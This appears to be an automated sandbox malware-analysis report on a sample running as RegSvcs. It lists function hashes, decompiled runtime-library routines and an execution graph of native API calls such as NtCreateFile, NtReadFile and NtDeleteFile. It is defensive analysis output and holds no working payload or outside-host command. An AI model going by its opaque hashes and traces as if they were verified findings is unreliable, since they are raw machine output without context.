                                          • Instruction ID: 472470a6ffff98d364a3ff9902f22dc097f4743644e06d842269a92874cb56d3
                                          • Opcode Fuzzy Hash: 434cf4358c5956be4136745e78d426cd2e79fb081c283383d4e67a657b93f1d0
                                          • Instruction Fuzzy Hash: 8D900269321000034545A599060450B0485B7E6395391C025F14065D0CC6619C696365
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013395F0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bd3804bf9147d62b03535b6d09e2a703f368f50d602e94411716a8ff33c2817
                                          • Instruction ID: c427ef3b69ba8096d77fe71a14657ddd74484b125f8854eacbb59b2b26345cf6
                                          • Opcode Fuzzy Hash: 5bd3804bf9147d62b03535b6d09e2a703f368f50d602e94411716a8ff33c2817
                                          • Instruction Fuzzy Hash: D990027530100803D504619948046860045A7E0345F51C021A6014695ED6A59C957175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339730 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9388be4037ae6a7484f22415c6e3475c0635933ef699e6d8eb31d475273b5afe
                                          • Instruction ID: b78e9cdfcccaa4905322989526a2cb5f35348b8b70c2ce096fd2d1b4fc0f0fbb
                                          • Opcode Fuzzy Hash: 9388be4037ae6a7484f22415c6e3475c0635933ef699e6d8eb31d475273b5afe
                                          • Instruction Fuzzy Hash: 4B90026570500403D540719954187060055A7E0245F51D021A0014594DC6999E5976E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133A710 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94d456dc2d82061ce4a93b50c4692ab68618099c5b3983cc578f4b63f300e4af
                                          • Instruction ID: 06e3de2e285c598fd26e715895daac67aa27a58e200b2a1b6d64d8c72f3ceb73
                                          • Opcode Fuzzy Hash: 94d456dc2d82061ce4a93b50c4692ab68618099c5b3983cc578f4b63f300e4af
                                          • Instruction Fuzzy Hash: 2790027530100053D900A6D95804A4A4145A7F0345B51D025A4004594CC5949C656165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133A770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddbf296e2812b2e3795c037dace6677c31538b00feee8edf2bb3b646d43beb2a
                                          • Instruction ID: 46a34945c747216d8dc890e7f72302a81ec35f05613b344d3b01d350233ae1b7
                                          • Opcode Fuzzy Hash: ddbf296e2812b2e3795c037dace6677c31538b00feee8edf2bb3b646d43beb2a
                                          • Instruction Fuzzy Hash: 2890027930504443D90065995804A870045A7E0349F51D421A04145DCDC6949C65B165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339770 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c73b3ada6945b081bf5eedc4375ce5ecca40c8b66d33d0a4f7245461ac308b43
                                          • Instruction ID: 071733d73c8eca645f5df66ff1d27b5c204c7d12046b5446f377c1674e2eeeb3
                                          • Opcode Fuzzy Hash: c73b3ada6945b081bf5eedc4375ce5ecca40c8b66d33d0a4f7245461ac308b43
                                          • Instruction Fuzzy Hash: 4790026530504443D50065995408A060045A7E0249F51D021A10545D5DC6759C55B175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339760 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 625e597526c2e0c332c2fa780e8de5b5c0a0877be67af0823c0d92f271928f32
                                          • Instruction ID: 998b2a0d09c2e5674442d2f79027986e5ed51b2a1c3a48085ee7b0763d5da455
                                          • Opcode Fuzzy Hash: 625e597526c2e0c332c2fa780e8de5b5c0a0877be67af0823c0d92f271928f32
                                          • Instruction Fuzzy Hash: D090027530100403D500619955087070045A7E0245F51D421A0414598DD6969C557165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339610 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd3bb8324a40f26872fee055107edd95134ffef2bb4a6bec7626615879e08f16
                                          • Instruction ID: 120badab2b8587ac91358b55cc61028a764c381a5ca6134b699c8ca70801846d
                                          • Opcode Fuzzy Hash: fd3bb8324a40f26872fee055107edd95134ffef2bb4a6bec7626615879e08f16
                                          • Instruction Fuzzy Hash: 7A90027570500803D550719944147460045A7E0345F51C021A0014694DC7959E5976E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339650 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06b6088d4befd38d15dfde90b942671ba411029b6230b4772faad7aa0347ee76
                                          • Instruction ID: 1f490de8877bbf613f4f9e9b44150473f77c7b9e1a6cdc845ccda97487ec72b9
                                          • Opcode Fuzzy Hash: 06b6088d4befd38d15dfde90b942671ba411029b6230b4772faad7aa0347ee76
                                          • Instruction Fuzzy Hash: E890027530504843D54071994404A460055A7E0349F51C021A00546D4DD6659D59B6A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013396D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e80c7661f623e5094fd597824a3ea7bbfa31ee0b4a1fc0185f63cfe4fb86b0a4
                                          • Instruction ID: 406e0fc12e5008dfafd5acebaae9f52929e2b11deecae36e59e1c1e327617c04
                                          • Opcode Fuzzy Hash: e80c7661f623e5094fd597824a3ea7bbfa31ee0b4a1fc0185f63cfe4fb86b0a4
                                          • Instruction Fuzzy Hash: BC90027530100843D50061994404B460045A7F0345F51C026A0114694DC655DC557565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01339670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 4b35dba2125d285dcd48adc6fbf2b318460dca7ccc4b050fa132131f8f1e56b2
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 26%
                                          			E0132645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x13ed360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0133FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E01312280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E0130FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x13eb1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0133B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                          0x0132645b
                                          0x01326463
                                          0x0132646d
                                          0x01326475
                                          0x0132647a
                                          0x0132647e
                                          0x01326480
                                          0x0132648c
                                          0x01326490
                                          0x01326495
                                          0x01326498
                                          0x0132649b
                                          0x0132649f
                                          0x013264a1
                                          0x01367c07
                                          0x01367c09
                                          0x01367c0c
                                          0x00000000
                                          0x013264a7
                                          0x013264a7
                                          0x013264aa
                                          0x01367bf7
                                          0x01367c00
                                          0x00000000
                                          0x01367bf9
                                          0x01367bf9
                                          0x01367bf9
                                          0x013264b0
                                          0x013264b0
                                          0x013264b2
                                          0x013264b2
                                          0x013264b3
                                          0x013264ba
                                          0x01326553
                                          0x0132655e
                                          0x01326566
                                          0x0132656c
                                          0x01326575
                                          0x0132657f
                                          0x01326585
                                          0x01326588
                                          0x01326588
                                          0x013264c7
                                          0x013264cb
                                          0x013264ce
                                          0x013264d3
                                          0x013264da
                                          0x013264e5
                                          0x013264ed
                                          0x013264f1
                                          0x013264f5
                                          0x013264f6
                                          0x013264fa
                                          0x01326502
                                          0x01326503
                                          0x01326504
                                          0x01326507
                                          0x0132651a
                                          0x01326524
                                          0x01326524
                                          0x01326526
                                          0x01326526
                                          0x013264aa
                                          0x0132652c
                                          0x0132652d
                                          0x0132652e
                                          0x01326539

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872
                                          • Opcode ID: a3594204bcdb26f651eeb108852ad060a8cf37db53a49e8862e2929769c1449a
                                          • Instruction ID: b8c39644e291d9b8fb89376ca6ef0a8052822155a081beaad8ec3676e086ccb7
                                          • Opcode Fuzzy Hash: a3594204bcdb26f651eeb108852ad060a8cf37db53a49e8862e2929769c1449a
                                          • Instruction Fuzzy Hash: 8B416BB16047169FC311DF28C485A1BBBE9BF88718F04452EF988DB341D731EA45CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0138FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0138FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0133CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01385720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01385720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x0138fdda
                                          0x0138fde2
                                          0x0138fde5
                                          0x0138fdec
                                          0x0138fdfa
                                          0x0138fdff
                                          0x0138fe0a
                                          0x0138fe0f
                                          0x0138fe17
                                          0x0138fe1e
                                          0x0138fe19
                                          0x0138fe19
                                          0x0138fe19
                                          0x0138fe20
                                          0x0138fe21
                                          0x0138fe22
                                          0x0138fe25
                                          0x0138fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0138FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0138FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0138FE01
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 9e36ce87c67b1538051b1e63566c8e22a3eceb236215346a2d75439fe35667f4
                                          • Instruction ID: bb916078191aab3449a36717cb6ac585adae7b148b9be1869cc6c0a1cf778a16
                                          • Opcode Fuzzy Hash: 9e36ce87c67b1538051b1e63566c8e22a3eceb236215346a2d75439fe35667f4
                                          • Instruction Fuzzy Hash: 56F0F632200201BFEA202B5ADC06F23BF5EEB44B34F144319F628565D1EA62F87087F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:8.2%
                                          Dynamic/Decrypted Code Coverage:1.3%
                                          Signature Coverage:2%
                                          Total number of Nodes:1214
                                          Total number of Limit Nodes:135
                                          execution_graph 33249 be172d 33252 bdded0 33249->33252 33253 bddef6 33252->33253 33260 bc9c10 33253->33260 33255 bddf02 33256 bddf26 33255->33256 33268 bc8c30 33255->33268 33300 bdcac0 33256->33300 33303 bc9b60 33260->33303 33262 bc9c1d 33263 bc9c24 33262->33263 33315 bc9b00 33262->33315 33263->33255 33269 bc8c57 33268->33269 33778 bcb0c0 33269->33778 33271 bc8c69 33782 bcae10 33271->33782 33273 bc8c86 33281 bc8c8d 33273->33281 33827 bcad40 LdrLoadDll 33273->33827 33275 bc8f3d 33275->33256 33277 bc8cfc 33277->33275 33278 bde400 2 API calls 33277->33278 33279 bc8d12 33278->33279 33280 bde400 2 API calls 33279->33280 33282 bc8d23 33280->33282 33281->33275 33786 bcde50 33281->33786 33283 bde400 2 API calls 33282->33283 33284 bc8d34 33283->33284 33798 bcc300 33284->33798 33286 bc8d41 33287 bd6f50 10 API calls 33286->33287 33288 bc8d53 33287->33288 33289 bd6f50 10 API calls 33288->33289 33290 bc8d63 33289->33290 33291 bc8d85 33290->33291 33292 bd6f50 10 API calls 33290->33292 33293 bd6f50 10 API calls 33291->33293 33299 bc8dc8 33291->33299 33294 bc8d7e 33292->33294 33296 bc8d9a 33293->33296 33828 bcc450 LdrLoadDll 33294->33828 33296->33299 33829 bccdb0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33296->33829 33299->33275 33810 bc88b0 33299->33810 33301 bdcadf 33300->33301 33302 bdd3e0 LdrLoadDll 33300->33302 33302->33301 33334 bdafd0 33303->33334 33307 bc9b86 33307->33262 33308 bc9b7c 33308->33307 33341 bdd790 33308->33341 33310 bc9bc3 33310->33307 33352 bc99a0 33310->33352 33312 bc9be3 33358 bc9410 LdrLoadDll 33312->33358 33314 bc9bf5 33314->33262 33316 bc9b1a 33315->33316 33317 bdda80 LdrLoadDll 33315->33317 33753 bdda80 33316->33753 33317->33316 33320 bdda80 LdrLoadDll 33321 bc9b41 33320->33321 33322 bcdc10 33321->33322 33323 bcdc29 33322->33323 33761 bcaf40 33323->33761 33325 bcdc3c 33765 bdc5f0 33325->33765 33329 bcdc62 33330 bcdc8d 33329->33330 33771 bdc670 33329->33771 33332 bdc8a0 2 API calls 33330->33332 33333 bc9c35 33332->33333 33333->33255 33335 bdafdf 33334->33335 33359 bd7360 33335->33359 33337 bc9b73 33338 bdae80 33337->33338 33365 bdca10 33338->33365 33342 bdd7a9 33341->33342 33372 bd6f50 33342->33372 33344 bdd7ca 33344->33310 33345 bdd7c1 33345->33344 33411 bdd5d0 33345->33411 33347 bdd7de 33347->33344 33428 bdc310 33347->33428 33731 bc7200 33352->33731 33354 bc99c1 33354->33312 33355 bc99ba 33355->33354 33744 bc74c0 33355->33744 33358->33314 33360 bd736e 33359->33360 33362 bd737a 33359->33362 33360->33362 33364 bd77e0 LdrLoadDll 33360->33364 33362->33337 33363 bd74cc 33363->33337 33364->33363 33368 bdd3e0 33365->33368 33367 bdae95 33367->33308 33369 bdd465 33368->33369 33370 bdd3ef 33368->33370 33369->33367 33370->33369 33371 bd7360 LdrLoadDll 33370->33371 33371->33369 33373 bd7293 33372->33373 33375 bd6f64 33372->33375 33373->33345 33375->33373 33436 bdc060 33375->33436 33377 bd7078 33439 bdc870 33377->33439 33378 bd7095 33443 bdc770 33378->33443 33381 bd7082 33381->33345 33382 bd70bc 33383 bde320 2 API calls 33382->33383 33386 bd70c8 33383->33386 33384 bd7257 33387 bdc8a0 2 API calls 33384->33387 33385 bd726d 33500 bd6c70 33385->33500 33386->33381 33386->33384 33386->33385 33391 bd7160 33386->33391 33388 bd725e 33387->33388 33388->33345 33390 bd7280 33390->33345 33392 bd71c7 33391->33392 33394 bd716f 33391->33394 33392->33384 33393 bd71da 33392->33393 33539 bdc6f0 33393->33539 33396 bd7188 33394->33396 33397 bd7174 33394->33397 33400 bd718d 33396->33400 33401 bd71a5 33396->33401 33538 bd6b30 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33397->33538 33446 bd6bd0 33400->33446 33401->33388 33458 bd68f0 33401->33458 33403 bd717e 33403->33345 33405 bd723a 33543 bdc8a0 33405->33543 33406 bd719b 33406->33345 33409 bd71bd 33409->33345 33410 bd7246 33410->33345 33412 bdd5eb 33411->33412 33413 bdd5fd 33412->33413 33569 bde2a0 33412->33569 33413->33347 33415 bdd61d 33572 bd6540 33415->33572 33417 bdd640 33417->33413 33418 bd6540 3 API calls 33417->33418 33420 bdd662 33418->33420 33420->33413 33604 bd78a0 33420->33604 33421 bdd6ea 33422 bdd6fa 33421->33422 33699 bdd360 LdrLoadDll 33421->33699 33615 bdd1d0 33422->33615 33425 bdd728 33694 bdc2d0 33425->33694 33429 bdd3e0 LdrLoadDll 33428->33429 33430 bdc32c 33429->33430 33725 35d967a 33430->33725 33431 bdc347 33433 bde320 33431->33433 33728 bdca80 33433->33728 33435 bdd839 33435->33310 33437 bdd3e0 LdrLoadDll 33436->33437 33438 bd7049 33437->33438 33438->33377 33438->33378 33438->33381 33440 bdc87a 33439->33440 33441 bdd3e0 LdrLoadDll 33440->33441 33442 bdc88c NtDeleteFile 33441->33442 33442->33381 33444 bdd3e0 LdrLoadDll 33443->33444 33445 bdc78c NtCreateFile 33444->33445 33445->33382 33447 bd6bec 33446->33447 33448 bdc6f0 LdrLoadDll 33447->33448 33449 bd6c0d 33448->33449 33450 bd6c28 33449->33450 33451 bd6c14 33449->33451 33453 bdc8a0 2 API calls 33450->33453 33452 bdc8a0 2 API calls 33451->33452 33454 bd6c1d 33452->33454 33455 bd6c31 33453->33455 33454->33406 33546 bde440 LdrLoadDll RtlAllocateHeap 33455->33546 33457 bd6c3c 33457->33406 33459 bd693b 33458->33459 33461 bd696e 33458->33461 33462 bdc6f0 LdrLoadDll 33459->33462 33460 bd6ab9 33463 bdc6f0 LdrLoadDll 33460->33463 33461->33460 33465 bd698a 33461->33465 33464 bd6956 33462->33464 33470 bd6ad4 33463->33470 33466 bdc8a0 2 API calls 33464->33466 33468 bdc6f0 LdrLoadDll 33465->33468 33467 bd695f 33466->33467 33467->33409 33469 bd69a5 33468->33469 33472 bd69ac 33469->33472 33473 bd69c1 33469->33473 33559 bdc730 LdrLoadDll 33470->33559 33475 bdc8a0 2 API calls 33472->33475 33476 bd69dc 33473->33476 33477 bd69c6 33473->33477 33474 bd6b0e 33478 bdc8a0 2 API calls 33474->33478 33479 bd69b5 33475->33479 33485 bd69e1 33476->33485 33547 bde400 33476->33547 33480 bdc8a0 2 API calls 33477->33480 33481 bd6b19 33478->33481 33479->33409 33482 bd69cf 33480->33482 33481->33409 33482->33409 33493 bd69f3 33485->33493 33550 bdc820 33485->33550 33486 bd6a47 33487 bd6a5e 33486->33487 33558 bdc6b0 LdrLoadDll 33486->33558 33489 bd6a7a 33487->33489 33490 bd6a65 33487->33490 33492 bdc8a0 2 API calls 33489->33492 33491 bdc8a0 2 API calls 33490->33491 33491->33493 33494 bd6a83 33492->33494 33493->33409 33495 bd6aaf 33494->33495 33553 bde120 33494->33553 33495->33409 33497 bd6a9a 33498 bde320 2 API calls 33497->33498 33499 bd6aa3 33498->33499 33499->33409 33501 bdc6f0 LdrLoadDll 33500->33501 33502 bd6cae 33501->33502 33503 bd6cb7 33502->33503 33505 bd6ccc 33502->33505 33504 bdc8a0 2 API calls 33503->33504 33519 bd6cc0 33504->33519 33506 bd6d3a 33505->33506 33507 bd6cf0 33505->33507 33509 bd6d3f 33506->33509 33510 bd6d80 33506->33510 33508 bdc7d0 2 API calls 33507->33508 33511 bd6d15 33508->33511 33513 bdc820 2 API calls 33509->33513 33509->33519 33514 bd6d92 33510->33514 33518 bd6f0d 33510->33518 33512 bdc8a0 2 API calls 33511->33512 33512->33519 33515 bd6d6a 33513->33515 33516 bd6d97 33514->33516 33524 bd6dd2 33514->33524 33520 bdc8a0 2 API calls 33515->33520 33517 bdc7d0 2 API calls 33516->33517 33521 bd6dba 33517->33521 33518->33519 33522 bdc8a0 2 API calls 33518->33522 33519->33390 33523 bd6d73 33520->33523 33525 bdc8a0 2 API calls 33521->33525 33526 bd6f3e 33522->33526 33523->33390 33527 bd6dd7 33524->33527 33533 bd6eb6 33524->33533 33528 bd6dc3 33525->33528 33526->33390 33527->33519 33529 bdc7d0 2 API calls 33527->33529 33528->33390 33530 bd6dfa 33529->33530 33531 bdc8a0 2 API calls 33530->33531 33532 bd6e05 33531->33532 33532->33390 33533->33519 33563 bdc7d0 33533->33563 33536 bdc8a0 2 API calls 33537 bd6efe 33536->33537 33537->33390 33538->33403 33540 bdd3e0 LdrLoadDll 33539->33540 33541 bd7222 33540->33541 33542 bdc730 LdrLoadDll 33541->33542 33542->33405 33544 bdd3e0 LdrLoadDll 33543->33544 33545 bdc8bc NtClose 33544->33545 33545->33410 33546->33457 33560 bdca40 33547->33560 33549 bde418 33549->33485 33551 bdd3e0 LdrLoadDll 33550->33551 33552 bdc83c NtReadFile 33551->33552 33552->33486 33554 bde12d 33553->33554 33555 bde144 33553->33555 33554->33555 33556 bde400 2 API calls 33554->33556 33555->33497 33557 